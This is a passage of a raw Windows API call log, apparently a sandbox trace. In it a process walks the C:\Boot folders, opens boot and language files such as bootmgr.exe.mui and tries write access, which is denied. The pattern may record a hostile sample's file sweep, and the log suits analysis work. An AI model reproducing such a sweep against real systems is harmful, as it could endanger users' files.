(HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0070.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0070.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.889] AreFileApisANSI () returned 1 [0070.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\updaterevokesipolicy.p7b", lpUsedDefaultChar=0x0) returned 33 [0070.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.889] AreFileApisANSI () returned 1 [0070.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x694e0 [0070.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b") returned 33 [0070.889] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0070.891] GetFileType (hFile=0x410) returned 0x1 [0070.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0070.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.891] CloseHandle (hObject=0x410) returned 1 [0070.891] AreFileApisANSI () returned 1 [0070.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69170 [0070.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b") returned 33 [0070.892] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.892] GetLastError () returned 0x5 [0070.892] GetLastError () returned 0x5 [0070.892] SetLastError (dwErrCode=0x5) [0070.892] GetLastError () returned 0x5 [0070.892] SetLastError (dwErrCode=0x5) [0070.892] GetLastError () returned 0x5 [0070.892] SetLastError (dwErrCode=0x5) [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.892] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.893] AreFileApisANSI () returned 1 [0070.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN", lpUsedDefaultChar=0x0) returned 14 [0070.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.893] AreFileApisANSI () returned 1 [0070.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-CN") returned 14 [0070.893] CreateFileW (lpFileName="C:\\Boot\\zh-CN" (normalized: "c:\\boot\\zh-cn"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.893] GetLastError () returned 0x5 [0070.893] GetLastError () returned 0x5 [0070.893] SetLastError (dwErrCode=0x5) [0070.893] GetLastError () returned 0x5 [0070.893] SetLastError (dwErrCode=0x5) [0070.893] GetLastError () returned 0x5 [0070.893] SetLastError (dwErrCode=0x5) [0070.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.893] AreFileApisANSI () returned 1 [0070.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0070.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-CN") returned 14 [0070.894] CreateFileW (lpFileName="C:\\Boot\\zh-CN" (normalized: "c:\\boot\\zh-cn"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.894] GetLastError () returned 0x5 [0070.894] GetLastError () returned 0x5 [0070.894] SetLastError (dwErrCode=0x5) [0070.894] GetLastError () returned 0x5 [0070.894] SetLastError (dwErrCode=0x5) [0070.894] GetLastError () returned 0x5 [0070.894] SetLastError (dwErrCode=0x5) [0070.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.894] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.894] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-CN\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0071.079] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.079] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.080] AreFileApisANSI () returned 1 [0071.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.080] AreFileApisANSI () returned 1 [0071.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0071.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0071.080] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0071.081] GetFileType (hFile=0x41c) returned 0x1 [0071.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.081] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.081] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.081] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.081] CloseHandle (hObject=0x41c) returned 1 [0071.081] AreFileApisANSI () returned 1 [0071.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0071.082] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.082] GetLastError () returned 0x5 [0071.082] GetLastError () returned 0x5 [0071.082] SetLastError (dwErrCode=0x5) [0071.082] GetLastError () returned 0x5 [0071.082] SetLastError (dwErrCode=0x5) [0071.082] GetLastError () returned 0x5 [0071.082] SetLastError (dwErrCode=0x5) [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.082] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0071.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.082] HeapFree (in: 